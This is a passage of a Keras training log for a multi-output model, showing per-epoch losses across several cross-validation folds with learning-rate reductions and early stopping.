output_ph_loss: 0.6962 - output_mg_c_loss: 0.4949 - output_c_loss: 0.6682 - val_loss: 4.4139 - val_output_react_loss: 0.4989 - val_output_bg_ph_loss: 0.6431 - val_output_ph_loss: 0.5878 - val_output_mg_c_loss: 0.5178 - val_output_c_loss: 0.5063 Epoch 33/70 120/120 - 7s - loss: 4.1801 - output_react_loss: 0.4557 - output_bg_ph_loss: 0.4810 - output_ph_loss: 0.6817 - output_mg_c_loss: 0.4887 - output_c_loss: 0.6477 - val_loss: 4.4204 - val_output_react_loss: 0.5017 - val_output_bg_ph_loss: 0.6414 - val_output_ph_loss: 0.5897 - val_output_mg_c_loss: 0.5185 - val_output_c_loss: 0.5075 Epoch 34/70 120/120 - 7s - loss: 4.2968 - output_react_loss: 0.4597 - output_bg_ph_loss: 0.4961 - output_ph_loss: 0.7081 - output_mg_c_loss: 0.5014 - output_c_loss: 0.6743 - val_loss: 4.4172 - val_output_react_loss: 0.4957 - val_output_bg_ph_loss: 0.6441 - val_output_ph_loss: 0.5912 - val_output_mg_c_loss: 0.5202 - val_output_c_loss: 0.5060 Epoch 35/70 120/120 - 7s - loss: 4.1495 - output_react_loss: 0.4533 - output_bg_ph_loss: 0.4722 - output_ph_loss: 0.6871 - output_mg_c_loss: 0.4812 - output_c_loss: 0.6492 - val_loss: 4.4591 - val_output_react_loss: 0.5022 - val_output_bg_ph_loss: 0.6493 - val_output_ph_loss: 0.5941 - val_output_mg_c_loss: 0.5252 - val_output_c_loss: 0.5116 Epoch 36/70 120/120 - 8s - loss: 4.0763 - output_react_loss: 0.4397 - output_bg_ph_loss: 0.4645 - output_ph_loss: 0.6734 - output_mg_c_loss: 0.4782 - output_c_loss: 0.6381 - val_loss: 4.4036 - val_output_react_loss: 0.4951 - val_output_bg_ph_loss: 0.6432 - val_output_ph_loss: 0.5894 - val_output_mg_c_loss: 0.5171 - val_output_c_loss: 0.5035 Epoch 37/70 120/120 - 7s - loss: 4.1241 - output_react_loss: 0.4450 - output_bg_ph_loss: 0.4707 - output_ph_loss: 0.6836 - output_mg_c_loss: 0.4806 - output_c_loss: 0.6479 - val_loss: 4.4011 - val_output_react_loss: 0.4963 - val_output_bg_ph_loss: 0.6378 - val_output_ph_loss: 0.5897 - val_output_mg_c_loss: 0.5173 - val_output_c_loss: 0.5087 Epoch 38/70 120/120 - 7s - loss: 4.1484 - output_react_loss: 0.4457 - output_bg_ph_loss: 0.4703 - output_ph_loss: 0.7004 - output_mg_c_loss: 0.4808 - output_c_loss: 0.6545 - val_loss: 4.4141 - val_output_react_loss: 0.4966 - val_output_bg_ph_loss: 0.6414 - val_output_ph_loss: 0.5913 - val_output_mg_c_loss: 0.5210 - val_output_c_loss: 0.5046 Epoch 39/70 120/120 - 7s - loss: 4.2517 - output_react_loss: 0.4578 - output_bg_ph_loss: 0.4794 - output_ph_loss: 0.7088 - output_mg_c_loss: 0.4968 - output_c_loss: 0.6750 - val_loss: 4.4511 - val_output_react_loss: 0.4998 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.6013 - val_output_mg_c_loss: 0.5233 - val_output_c_loss: 0.5109 Epoch 40/70 120/120 - 7s - loss: 4.0662 - output_react_loss: 0.4374 - output_bg_ph_loss: 0.4607 - output_ph_loss: 0.6695 - output_mg_c_loss: 0.4729 - output_c_loss: 0.6544 - val_loss: 4.4141 - val_output_react_loss: 0.5001 - val_output_bg_ph_loss: 0.6404 - val_output_ph_loss: 0.5905 - val_output_mg_c_loss: 0.5186 - val_output_c_loss: 0.5056 Epoch 41/70 120/120 - 7s - loss: 3.8941 - output_react_loss: 0.4138 - output_bg_ph_loss: 0.4496 - output_ph_loss: 0.6444 - output_mg_c_loss: 0.4510 - output_c_loss: 0.6209 - val_loss: 4.4168 - val_output_react_loss: 0.4977 - val_output_bg_ph_loss: 0.6417 - val_output_ph_loss: 0.5949 - val_output_mg_c_loss: 0.5181 - val_output_c_loss: 0.5070 Epoch 42/70 Epoch 00042: ReduceLROnPlateau reducing learning rate to 0.00010000000474974513. 120/120 - 7s - loss: 4.1502 - output_react_loss: 0.4426 - output_bg_ph_loss: 0.4664 - output_ph_loss: 0.6960 - output_mg_c_loss: 0.4868 - output_c_loss: 0.6625 - val_loss: 4.4021 - val_output_react_loss: 0.4957 - val_output_bg_ph_loss: 0.6418 - val_output_ph_loss: 0.5860 - val_output_mg_c_loss: 0.5186 - val_output_c_loss: 0.5040 Epoch 43/70 120/120 - 7s - loss: 3.8376 - output_react_loss: 0.4166 - output_bg_ph_loss: 0.4320 - output_ph_loss: 0.6376 - output_mg_c_loss: 0.4413 - output_c_loss: 0.6202 - val_loss: 4.3635 - val_output_react_loss: 0.4917 - val_output_bg_ph_loss: 0.6368 - val_output_ph_loss: 0.5831 - val_output_mg_c_loss: 0.5129 - val_output_c_loss: 0.4978 Epoch 44/70 120/120 - 7s - loss: 3.7882 - output_react_loss: 0.4002 - output_bg_ph_loss: 0.4222 - output_ph_loss: 0.6415 - output_mg_c_loss: 0.4426 - output_c_loss: 0.6167 - val_loss: 4.3476 - val_output_react_loss: 0.4887 - val_output_bg_ph_loss: 0.6351 - val_output_ph_loss: 0.5814 - val_output_mg_c_loss: 0.5106 - val_output_c_loss: 0.4974 Epoch 45/70 120/120 - 7s - loss: 3.7885 - output_react_loss: 0.4035 - output_bg_ph_loss: 0.4196 - output_ph_loss: 0.6485 - output_mg_c_loss: 0.4403 - output_c_loss: 0.6132 - val_loss: 4.3480 - val_output_react_loss: 0.4893 - val_output_bg_ph_loss: 0.6345 - val_output_ph_loss: 0.5814 - val_output_mg_c_loss: 0.5105 - val_output_c_loss: 0.4981 Epoch 46/70 120/120 - 7s - loss: 3.9172 - output_react_loss: 0.4131 - output_bg_ph_loss: 0.4344 - output_ph_loss: 0.6645 - output_mg_c_loss: 0.4510 - output_c_loss: 0.6555 - val_loss: 4.3521 - val_output_react_loss: 0.4891 - val_output_bg_ph_loss: 0.6358 - val_output_ph_loss: 0.5817 - val_output_mg_c_loss: 0.5113 - val_output_c_loss: 0.4981 Epoch 47/70 120/120 - 7s - loss: 3.8257 - output_react_loss: 0.4088 - output_bg_ph_loss: 0.4219 - output_ph_loss: 0.6486 - output_mg_c_loss: 0.4438 - output_c_loss: 0.6281 - val_loss: 4.3550 - val_output_react_loss: 0.4909 - val_output_bg_ph_loss: 0.6359 - val_output_ph_loss: 0.5818 - val_output_mg_c_loss: 0.5110 - val_output_c_loss: 0.4977 Epoch 48/70 120/120 - 7s - loss: 3.6280 - output_react_loss: 0.3876 - output_bg_ph_loss: 0.4024 - output_ph_loss: 0.6122 - output_mg_c_loss: 0.4184 - output_c_loss: 0.5991 - val_loss: 4.3525 - val_output_react_loss: 0.4897 - val_output_bg_ph_loss: 0.6355 - val_output_ph_loss: 0.5814 - val_output_mg_c_loss: 0.5109 - val_output_c_loss: 0.4990 Epoch 49/70 Epoch 00049: ReduceLROnPlateau reducing learning rate to 1.0000000474974514e-05. 120/120 - 7s - loss: 3.6680 - output_react_loss: 0.3882 - output_bg_ph_loss: 0.4083 - output_ph_loss: 0.6171 - output_mg_c_loss: 0.4273 - output_c_loss: 0.6033 - val_loss: 4.3544 - val_output_react_loss: 0.4894 - val_output_bg_ph_loss: 0.6365 - val_output_ph_loss: 0.5815 - val_output_mg_c_loss: 0.5111 - val_output_c_loss: 0.4988 Epoch 50/70 120/120 - 7s - loss: 3.8273 - output_react_loss: 0.4043 - output_bg_ph_loss: 0.4246 - output_ph_loss: 0.6552 - output_mg_c_loss: 0.4440 - output_c_loss: 0.6263 - val_loss: 4.3520 - val_output_react_loss: 0.4888 - val_output_bg_ph_loss: 0.6361 - val_output_ph_loss: 0.5814 - val_output_mg_c_loss: 0.5113 - val_output_c_loss: 0.4981 Epoch 51/70 120/120 - 7s - loss: 3.7274 - output_react_loss: 0.3981 - output_bg_ph_loss: 0.4092 - output_ph_loss: 0.6250 - output_mg_c_loss: 0.4293 - output_c_loss: 0.6293 - val_loss: 4.3505 - val_output_react_loss: 0.4884 - val_output_bg_ph_loss: 0.6360 - val_output_ph_loss: 0.5816 - val_output_mg_c_loss: 0.5112 - val_output_c_loss: 0.4977 Epoch 52/70 120/120 - 7s - loss: 3.6490 - output_react_loss: 0.3857 - output_bg_ph_loss: 0.4046 - output_ph_loss: 0.6147 - output_mg_c_loss: 0.4234 - output_c_loss: 0.6068 - val_loss: 4.3496 - val_output_react_loss: 0.4886 - val_output_bg_ph_loss: 0.6357 - val_output_ph_loss: 0.5816 - val_output_mg_c_loss: 0.5108 - val_output_c_loss: 0.4978 Epoch 53/70 120/120 - 7s - loss: 3.7603 - output_react_loss: 0.3971 - output_bg_ph_loss: 0.4124 - output_ph_loss: 0.6570 - output_mg_c_loss: 0.4288 - output_c_loss: 0.6266 - val_loss: 4.3507 - val_output_react_loss: 0.4887 - val_output_bg_ph_loss: 0.6356 - val_output_ph_loss: 0.5816 - val_output_mg_c_loss: 0.5111 - val_output_c_loss: 0.4982 Epoch 54/70 Restoring model weights from the end of the best epoch. Epoch 00054: ReduceLROnPlateau reducing learning rate to 1.0000000656873453e-06. 120/120 - 7s - loss: 3.7694 - output_react_loss: 0.3981 - output_bg_ph_loss: 0.4149 - output_ph_loss: 0.6489 - output_mg_c_loss: 0.4337 - output_c_loss: 0.6269 - val_loss: 4.3503 - val_output_react_loss: 0.4886 - val_output_bg_ph_loss: 0.6355 - val_output_ph_loss: 0.5817 - val_output_mg_c_loss: 0.5111 - val_output_c_loss: 0.4981 Epoch 00054: early stopping FOLD: 3 Epoch 1/70 120/120 - 9s - loss: 8.8878 - output_react_loss: 0.9465 - output_bg_ph_loss: 1.1514 - output_ph_loss: 1.3084 - output_mg_c_loss: 1.1391 - output_c_loss: 1.1053 - val_loss: 6.8064 - val_output_react_loss: 0.7579 - val_output_bg_ph_loss: 0.9719 - val_output_ph_loss: 0.8874 - val_output_mg_c_loss: 0.8577 - val_output_c_loss: 0.7440 Epoch 2/70 120/120 - 7s - loss: 7.5866 - output_react_loss: 0.8103 - output_bg_ph_loss: 0.9564 - output_ph_loss: 1.1300 - output_mg_c_loss: 0.9663 - output_c_loss: 0.9906 - val_loss: 5.9556 - val_output_react_loss: 0.6788 - val_output_bg_ph_loss: 0.8620 - val_output_ph_loss: 0.7972 - val_output_mg_c_loss: 0.7089 - val_output_c_loss: 0.6591 Epoch 3/70 120/120 - 7s - loss: 7.1029 - output_react_loss: 0.7670 - output_bg_ph_loss: 0.8975 - output_ph_loss: 1.0765 - output_mg_c_loss: 0.8802 - output_c_loss: 0.9372 - val_loss: 5.5450 - val_output_react_loss: 0.6525 - val_output_bg_ph_loss: 0.7868 - val_output_ph_loss: 0.7563 - val_output_mg_c_loss: 0.6494 - val_output_c_loss: 0.6112 Epoch 4/70 120/120 - 7s - loss: 6.6969 - output_react_loss: 0.7376 - output_bg_ph_loss: 0.8420 - output_ph_loss: 1.0159 - output_mg_c_loss: 0.8264 - output_c_loss: 0.8691 - val_loss: 5.2467 - val_output_react_loss: 0.6092 - val_output_bg_ph_loss: 0.7460 - val_output_ph_loss: 0.7138 - val_output_mg_c_loss: 0.6214 - val_output_c_loss: 0.5797 Epoch 5/70 120/120 - 7s - loss: 6.4476 - output_react_loss: 0.7109 - output_bg_ph_loss: 0.8136 - output_ph_loss: 0.9755 - output_mg_c_loss: 0.7868 - output_c_loss: 0.8494 - val_loss: 5.0943 - val_output_react_loss: 0.5976 - val_output_bg_ph_loss: 0.7243 - val_output_ph_loss: 0.7027 - val_output_mg_c_loss: 0.5918 - val_output_c_loss: 0.5641 Epoch 6/70 120/120 - 7s - loss: 6.3095 - output_react_loss: 0.7026 - output_bg_ph_loss: 0.7853 - output_ph_loss: 0.9685 - output_mg_c_loss: 0.7654 - output_c_loss: 0.8344 - val_loss: 4.9502 - val_output_react_loss: 0.5770 - val_output_bg_ph_loss: 0.7029 - val_output_ph_loss: 0.6805 - val_output_mg_c_loss: 0.5747 - val_output_c_loss: 0.5605 Epoch 7/70 120/120 - 7s - loss: 6.0598 - output_react_loss: 0.6725 - output_bg_ph_loss: 0.7548 - output_ph_loss: 0.9201 - output_mg_c_loss: 0.7363 - output_c_loss: 0.8123 - val_loss: 4.8857 - val_output_react_loss: 0.5688 - val_output_bg_ph_loss: 0.6976 - val_output_ph_loss: 0.6561 - val_output_mg_c_loss: 0.5791 - val_output_c_loss: 0.5388 Epoch 8/70 120/120 - 7s - loss: 6.0025 - output_react_loss: 0.6656 - output_bg_ph_loss: 0.7450 - output_ph_loss: 0.9193 - output_mg_c_loss: 0.7267 - output_c_loss: 0.8085 - val_loss: 4.8275 - val_output_react_loss: 0.5589 - val_output_bg_ph_loss: 0.6901 - val_output_ph_loss: 0.6632 - val_output_mg_c_loss: 0.5609 - val_output_c_loss: 0.5444 Epoch 9/70 120/120 - 7s - loss: 5.8000 - output_react_loss: 0.6429 - output_bg_ph_loss: 0.7186 - output_ph_loss: 0.8900 - output_mg_c_loss: 0.6959 - output_c_loss: 0.7954 - val_loss: 4.8379 - val_output_react_loss: 0.5601 - val_output_bg_ph_loss: 0.6958 - val_output_ph_loss: 0.6618 - val_output_mg_c_loss: 0.5629 - val_output_c_loss: 0.5385 Epoch 10/70 120/120 - 7s - loss: 5.7426 - output_react_loss: 0.6346 - output_bg_ph_loss: 0.7066 - output_ph_loss: 0.8856 - output_mg_c_loss: 0.6923 - output_c_loss: 0.7900 - val_loss: 4.7528 - val_output_react_loss: 0.5533 - val_output_bg_ph_loss: 0.6816 - val_output_ph_loss: 0.6431 - val_output_mg_c_loss: 0.5523 - val_output_c_loss: 0.5353 Epoch 11/70 120/120 - 7s - loss: 5.5888 - output_react_loss: 0.6175 - output_bg_ph_loss: 0.6880 - output_ph_loss: 0.8729 - output_mg_c_loss: 0.6694 - output_c_loss: 0.7663 - val_loss: 4.6962 - val_output_react_loss: 0.5468 - val_output_bg_ph_loss: 0.6738 - val_output_ph_loss: 0.6295 - val_output_mg_c_loss: 0.5505 - val_output_c_loss: 0.5243 Epoch 12/70 120/120 - 7s - loss: 5.4090 - output_react_loss: 0.6094 - output_bg_ph_loss: 0.6587 - output_ph_loss: 0.8390 - output_mg_c_loss: 0.6427 - output_c_loss: 0.7485 - val_loss: 4.6933 - val_output_react_loss: 0.5430 - val_output_bg_ph_loss: 0.6665 - val_output_ph_loss: 0.6346 - val_output_mg_c_loss: 0.5538 - val_output_c_loss: 0.5320 Epoch 13/70 120/120 - 7s - loss: 5.2612 - output_react_loss: 0.5896 - output_bg_ph_loss: 0.6432 - output_ph_loss: 0.8160 - output_mg_c_loss: 0.6258 - output_c_loss: 0.7279 - val_loss: 4.7046 - val_output_react_loss: 0.5389 - val_output_bg_ph_loss: 0.6817 - val_output_ph_loss: 0.6311 - val_output_mg_c_loss: 0.5543 - val_output_c_loss: 0.5237 Epoch 14/70 120/120 - 7s - loss: 5.2187 - output_react_loss: 0.5794 - output_bg_ph_loss: 0.6374 - output_ph_loss: 0.8238 - output_mg_c_loss: 0.6175 - output_c_loss: 0.7265 - val_loss: 4.6621 - val_output_react_loss: 0.5476 - val_output_bg_ph_loss: 0.6648 - val_output_ph_loss: 0.6268 - val_output_mg_c_loss: 0.5409 - val_output_c_loss: 0.5285 Epoch 15/70 120/120 - 7s - loss: 5.3190 - output_react_loss: 0.5846 - output_bg_ph_loss: 0.6397 - output_ph_loss: 0.8447 - output_mg_c_loss: 0.6308 - output_c_loss: 0.7639 - val_loss: 4.6176 - val_output_react_loss: 0.5359 - val_output_bg_ph_loss: 0.6655 - val_output_ph_loss: 0.6204 - val_output_mg_c_loss: 0.5372 - val_output_c_loss: 0.5199 Epoch 16/70 120/120 - 7s - loss: 5.0473 - output_react_loss: 0.5641 - output_bg_ph_loss: 0.6095 - output_ph_loss: 0.8032 - output_mg_c_loss: 0.5915 - output_c_loss: 0.7138 - val_loss: 4.6430 - val_output_react_loss: 0.5349 - val_output_bg_ph_loss: 0.6725 - val_output_ph_loss: 0.6229 - val_output_mg_c_loss: 0.5424 - val_output_c_loss: 0.5205 Epoch 17/70 120/120 - 7s - loss: 4.9326 - output_react_loss: 0.5489 - output_bg_ph_loss: 0.5868 - output_ph_loss: 0.7831 - output_mg_c_loss: 0.5786 - output_c_loss: 0.7209 - val_loss: 4.5794 - val_output_react_loss: 0.5290 - val_output_bg_ph_loss: 0.6614 - val_output_ph_loss: 0.6149 - val_output_mg_c_loss: 0.5338 - val_output_c_loss: 0.5161 Epoch 18/70 120/120 - 7s - loss: 4.9355 - output_react_loss: 0.5483 - output_bg_ph_loss: 0.5927 - output_ph_loss: 0.7782 - output_mg_c_loss: 0.5787 - output_c_loss: 0.7180 - val_loss: 4.6358 - val_output_react_loss: 0.5300 - val_output_bg_ph_loss: 0.6729 - val_output_ph_loss: 0.6295 - val_output_mg_c_loss: 0.5395 - val_output_c_loss: 0.5215 Epoch 19/70 120/120 - 8s - loss: 5.0316 - output_react_loss: 0.5538 - output_bg_ph_loss: 0.5885 - output_ph_loss: 0.8241 - output_mg_c_loss: 0.5893 - output_c_loss: 0.7444 - val_loss: 4.6052 - val_output_react_loss: 0.5313 - val_output_bg_ph_loss: 0.6665 - val_output_ph_loss: 0.6143 - val_output_mg_c_loss: 0.5373 - val_output_c_loss: 0.5206 Epoch 20/70 120/120 - 7s - loss: 4.7251 - output_react_loss: 0.5275 - output_bg_ph_loss: 0.5618 - output_ph_loss: 0.7502 - output_mg_c_loss: 0.5501 - output_c_loss: 0.6961 - val_loss: 4.5849 - val_output_react_loss: 0.5374 - val_output_bg_ph_loss: 0.6602 - val_output_ph_loss: 0.6142 - val_output_mg_c_loss: 0.5287 - val_output_c_loss: 0.5181 Epoch 21/70 120/120 - 7s - loss: 4.6258 - output_react_loss: 0.5121 - output_bg_ph_loss: 0.5549 - output_ph_loss: 0.7380 - output_mg_c_loss: 0.5426 - output_c_loss: 0.6686 - val_loss: 4.5551 - val_output_react_loss: 0.5311 - val_output_bg_ph_loss: 0.6546 - val_output_ph_loss: 0.6146 - val_output_mg_c_loss: 0.5248 - val_output_c_loss: 0.5197 Epoch 22/70 120/120 - 7s - loss: 4.7790 - output_react_loss: 0.5214 - output_bg_ph_loss: 0.5564 - output_ph_loss: 0.7906 - output_mg_c_loss: 0.5594 - output_c_loss: 0.7140 - val_loss: 4.5911 - val_output_react_loss: 0.5309 - val_output_bg_ph_loss: 0.6656 - val_output_ph_loss: 0.6121 - val_output_mg_c_loss: 0.5339 - val_output_c_loss: 0.5181 Epoch 23/70 120/120 - 7s - loss: 4.6777 - output_react_loss: 0.5160 - output_bg_ph_loss: 0.5486 - output_ph_loss: 0.7594 - output_mg_c_loss: 0.5436 - output_c_loss: 0.7019 - val_loss: 4.5732 - val_output_react_loss: 0.5345 - val_output_bg_ph_loss: 0.6562 - val_output_ph_loss: 0.6131 - val_output_mg_c_loss: 0.5282 - val_output_c_loss: 0.5224 Epoch 24/70 120/120 - 7s - loss: 4.6942 - output_react_loss: 0.5073 - output_bg_ph_loss: 0.5480 - output_ph_loss: 0.7827 - output_mg_c_loss: 0.5429 - output_c_loss: 0.7151 - val_loss: 4.5363 - val_output_react_loss: 0.5251 - val_output_bg_ph_loss: 0.6569 - val_output_ph_loss: 0.6108 - val_output_mg_c_loss: 0.5240 - val_output_c_loss: 0.5135 Epoch 25/70 120/120 - 7s - loss: 4.4474 - output_react_loss: 0.4898 - output_bg_ph_loss: 0.5233 - output_ph_loss: 0.7180 - output_mg_c_loss: 0.5243 - output_c_loss: 0.6546 - val_loss: 4.5785 - val_output_react_loss: 0.5333 - val_output_bg_ph_loss: 0.6567 - val_output_ph_loss: 0.6147 - val_output_mg_c_loss: 0.5327 - val_output_c_loss: 0.5183 Epoch 26/70 120/120 - 7s - loss: 4.4364 - output_react_loss: 0.4836 - output_bg_ph_loss: 0.5196 - output_ph_loss: 0.7170 - output_mg_c_loss: 0.5190 - output_c_loss: 0.6751 - val_loss: 4.5358 - val_output_react_loss: 0.5244 - val_output_bg_ph_loss: 0.6547 - val_output_ph_loss: 0.6109 - val_output_mg_c_loss: 0.5261 - val_output_c_loss: 0.5144 Epoch 27/70 120/120 - 7s - loss: 4.5330 - output_react_loss: 0.4975 - output_bg_ph_loss: 0.5284 - output_ph_loss: 0.7392 - output_mg_c_loss: 0.5278 - output_c_loss: 0.6863 - val_loss: 4.5744 - val_output_react_loss: 0.5281 - val_output_bg_ph_loss: 0.6655 - val_output_ph_loss: 0.6125 - val_output_mg_c_loss: 0.5286 - val_output_c_loss: 0.5174 Epoch 28/70 120/120 - 7s - loss: 4.3557 - output_react_loss: 0.4810 - output_bg_ph_loss: 0.5061 - output_ph_loss: 0.7059 - output_mg_c_loss: 0.5066 - output_c_loss: 0.6622 - val_loss: 4.5536 - val_output_react_loss: 0.5334 - val_output_bg_ph_loss: 0.6568 - val_output_ph_loss: 0.6090 - val_output_mg_c_loss: 0.5254 - val_output_c_loss: 0.5135 Epoch 29/70 120/120 - 7s - loss: 4.4306 - output_react_loss: 0.4779 - output_bg_ph_loss: 0.5091 - output_ph_loss: 0.7387 - output_mg_c_loss: 0.5172 - output_c_loss: 0.6837 - val_loss: 4.6267 - val_output_react_loss: 0.5371 - val_output_bg_ph_loss: 0.6648 - val_output_ph_loss: 0.6151 - val_output_mg_c_loss: 0.5398 - val_output_c_loss: 0.5282 Epoch 30/70 120/120 - 7s - loss: 4.5029 - output_react_loss: 0.4844 - output_bg_ph_loss: 0.5150 - output_ph_loss: 0.7510 - output_mg_c_loss: 0.5286 - output_c_loss: 0.6959 - val_loss: 4.5810 - val_output_react_loss: 0.5327 - val_output_bg_ph_loss: 0.6646 - val_output_ph_loss: 0.6125 - val_output_mg_c_loss: 0.5286 - val_output_c_loss: 0.5167 Epoch 31/70 Epoch 00031: ReduceLROnPlateau reducing learning rate to 0.00010000000474974513. 120/120 - 7s - loss: 4.4161 - output_react_loss: 0.4745 - output_bg_ph_loss: 0.5149 - output_ph_loss: 0.7337 - output_mg_c_loss: 0.5139 - output_c_loss: 0.6759 - val_loss: 4.5696 - val_output_react_loss: 0.5333 - val_output_bg_ph_loss: 0.6593 - val_output_ph_loss: 0.6123 - val_output_mg_c_loss: 0.5279 - val_output_c_loss: 0.5163 Epoch 32/70 120/120 - 7s - loss: 4.1864 - output_react_loss: 0.4506 - output_bg_ph_loss: 0.4808 - output_ph_loss: 0.7000 - output_mg_c_loss: 0.4885 - output_c_loss: 0.6466 - val_loss: 4.4873 - val_output_react_loss: 0.5233 - val_output_bg_ph_loss: 0.6486 - val_output_ph_loss: 0.6018 - val_output_mg_c_loss: 0.5162 - val_output_c_loss: 0.5093 Epoch 33/70 120/120 - 7s - loss: 4.0855 - output_react_loss: 0.4382 - output_bg_ph_loss: 0.4705 - output_ph_loss: 0.6808 - output_mg_c_loss: 0.4763 - output_c_loss: 0.6347 - val_loss: 4.4754 - val_output_react_loss: 0.5233 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.6000 - val_output_mg_c_loss: 0.5147 - val_output_c_loss: 0.5069 Epoch 34/70 120/120 - 7s - loss: 4.2179 - output_react_loss: 0.4546 - output_bg_ph_loss: 0.4770 - output_ph_loss: 0.7134 - output_mg_c_loss: 0.4834 - output_c_loss: 0.6746 - val_loss: 4.4678 - val_output_react_loss: 0.5224 - val_output_bg_ph_loss: 0.6447 - val_output_ph_loss: 0.5986 - val_output_mg_c_loss: 0.5139 - val_output_c_loss: 0.5071 Epoch 35/70 120/120 - 8s - loss: 4.0815 - output_react_loss: 0.4387 - output_bg_ph_loss: 0.4625 - output_ph_loss: 0.6882 - output_mg_c_loss: 0.4749 - output_c_loss: 0.6413 - val_loss: 4.4744 - val_output_react_loss: 0.5229 - val_output_bg_ph_loss: 0.6451 - val_output_ph_loss: 0.6008 - val_output_mg_c_loss: 0.5145 - val_output_c_loss: 0.5086 Epoch 36/70 120/120 - 7s - loss: 3.9169 - output_react_loss: 0.4280 - output_bg_ph_loss: 0.4465 - output_ph_loss: 0.6464 - output_mg_c_loss: 0.4512 - output_c_loss: 0.6190 - val_loss: 4.4753 - val_output_react_loss: 0.5229 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.5999 - val_output_mg_c_loss: 0.5151 - val_output_c_loss: 0.5068 Epoch 37/70 120/120 - 7s - loss: 4.0919 - output_react_loss: 0.4353 - output_bg_ph_loss: 0.4631 - output_ph_loss: 0.6960 - output_mg_c_loss: 0.4765 - output_c_loss: 0.6463 - val_loss: 4.4893 - val_output_react_loss: 0.5247 - val_output_bg_ph_loss: 0.6476 - val_output_ph_loss: 0.6019 - val_output_mg_c_loss: 0.5167 - val_output_c_loss: 0.5095 Epoch 38/70 120/120 - 7s - loss: 4.0659 - output_react_loss: 0.4359 - output_bg_ph_loss: 0.4577 - output_ph_loss: 0.6921 - output_mg_c_loss: 0.4670 - output_c_loss: 0.6526 - val_loss: 4.4675 - val_output_react_loss: 0.5223 - val_output_bg_ph_loss: 0.6447 - val_output_ph_loss: 0.5998 - val_output_mg_c_loss: 0.5130 - val_output_c_loss: 0.5076 Epoch 39/70 120/120 - 8s - loss: 4.0875 - output_react_loss: 0.4352 - output_bg_ph_loss: 0.4633 - output_ph_loss: 0.6898 - output_mg_c_loss: 0.4738 - output_c_loss: 0.6533 - val_loss: 4.4727 - val_output_react_loss: 0.5232 - val_output_bg_ph_loss: 0.6451 - val_output_ph_loss: 0.6003 - val_output_mg_c_loss: 0.5138 - val_output_c_loss: 0.5081 Epoch 40/70 120/120 - 7s - loss: 4.0767 - output_react_loss: 0.4371 - output_bg_ph_loss: 0.4611 - output_ph_loss: 0.6976 - output_mg_c_loss: 0.4693 - output_c_loss: 0.6442 - val_loss: 4.4739 - val_output_react_loss: 0.5230 - val_output_bg_ph_loss: 0.6453 - val_output_ph_loss: 0.5995 - val_output_mg_c_loss: 0.5148 - val_output_c_loss: 0.5082 Epoch 41/70 120/120 - 7s - loss: 3.8735 - output_react_loss: 0.4178 - output_bg_ph_loss: 0.4458 - output_ph_loss: 0.6334 - output_mg_c_loss: 0.4508 - output_c_loss: 0.6114 - val_loss: 4.4756 - val_output_react_loss: 0.5230 - val_output_bg_ph_loss: 0.6461 - val_output_ph_loss: 0.6011 - val_output_mg_c_loss: 0.5138 - val_output_c_loss: 0.5086 Epoch 42/70 120/120 - 7s - loss: 4.1327 - output_react_loss: 0.4404 - output_bg_ph_loss: 0.4608 - output_ph_loss: 0.7110 - output_mg_c_loss: 0.4753 - output_c_loss: 0.6686 - val_loss: 4.4778 - val_output_react_loss: 0.5237 - val_output_bg_ph_loss: 0.6473 - val_output_ph_loss: 0.6004 - val_output_mg_c_loss: 0.5139 - val_output_c_loss: 0.5076 Epoch 43/70 Epoch 00043: ReduceLROnPlateau reducing learning rate to 1.0000000474974514e-05. 120/120 - 8s - loss: 3.9421 - output_react_loss: 0.4257 - output_bg_ph_loss: 0.4502 - output_ph_loss: 0.6623 - output_mg_c_loss: 0.4530 - output_c_loss: 0.6219 - val_loss: 4.4769 - val_output_react_loss: 0.5229 - val_output_bg_ph_loss: 0.6462 - val_output_ph_loss: 0.6005 - val_output_mg_c_loss: 0.5155 - val_output_c_loss: 0.5072 Epoch 44/70 120/120 - 7s - loss: 3.9330 - output_react_loss: 0.4210 - output_bg_ph_loss: 0.4489 - output_ph_loss: 0.6522 - output_mg_c_loss: 0.4536 - output_c_loss: 0.6336 - val_loss: 4.4741 - val_output_react_loss: 0.5232 - val_output_bg_ph_loss: 0.6460 - val_output_ph_loss: 0.6005 - val_output_mg_c_loss: 0.5140 - val_output_c_loss: 0.5073 Epoch 45/70 120/120 - 7s - loss: 4.0963 - output_react_loss: 0.4412 - output_bg_ph_loss: 0.4577 - output_ph_loss: 0.6950 - output_mg_c_loss: 0.4753 - output_c_loss: 0.6529 - val_loss: 4.4739 - val_output_react_loss: 0.5230 - val_output_bg_ph_loss: 0.6461 - val_output_ph_loss: 0.5999 - val_output_mg_c_loss: 0.5141 - val_output_c_loss: 0.5075 Epoch 46/70 120/120 - 7s - loss: 4.0753 - output_react_loss: 0.4336 - output_bg_ph_loss: 0.4550 - output_ph_loss: 0.7005 - output_mg_c_loss: 0.4690 - output_c_loss: 0.6598 - val_loss: 4.4747 - val_output_react_loss: 0.5229 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.6005 - val_output_mg_c_loss: 0.5142 - val_output_c_loss: 0.5074 Epoch 47/70 120/120 - 7s - loss: 3.9274 - output_react_loss: 0.4214 - output_bg_ph_loss: 0.4449 - output_ph_loss: 0.6641 - output_mg_c_loss: 0.4539 - output_c_loss: 0.6230 - val_loss: 4.4726 - val_output_react_loss: 0.5228 - val_output_bg_ph_loss: 0.6461 - val_output_ph_loss: 0.6000 - val_output_mg_c_loss: 0.5139 - val_output_c_loss: 0.5071 Epoch 48/70 Restoring model weights from the end of the best epoch. Epoch 00048: ReduceLROnPlateau reducing learning rate to 1.0000000656873453e-06. 120/120 - 7s - loss: 3.9150 - output_react_loss: 0.4156 - output_bg_ph_loss: 0.4457 - output_ph_loss: 0.6547 - output_mg_c_loss: 0.4567 - output_c_loss: 0.6243 - val_loss: 4.4713 - val_output_react_loss: 0.5225 - val_output_bg_ph_loss: 0.6460 - val_output_ph_loss: 0.5998 - val_output_mg_c_loss: 0.5137 - val_output_c_loss: 0.5070 Epoch 00048: early stopping FOLD: 4 Epoch 1/70 120/120 - 9s - loss: 8.8906 - output_react_loss: 0.9509 - output_bg_ph_loss: 1.1470 - output_ph_loss: 1.3217 - output_mg_c_loss: 1.1242 - output_c_loss: 1.1248 - val_loss: 6.7099 - val_output_react_loss: 0.7702 - val_output_bg_ph_loss: 0.9436 - val_output_ph_loss: 0.8752 - val_output_mg_c_loss: 0.8307 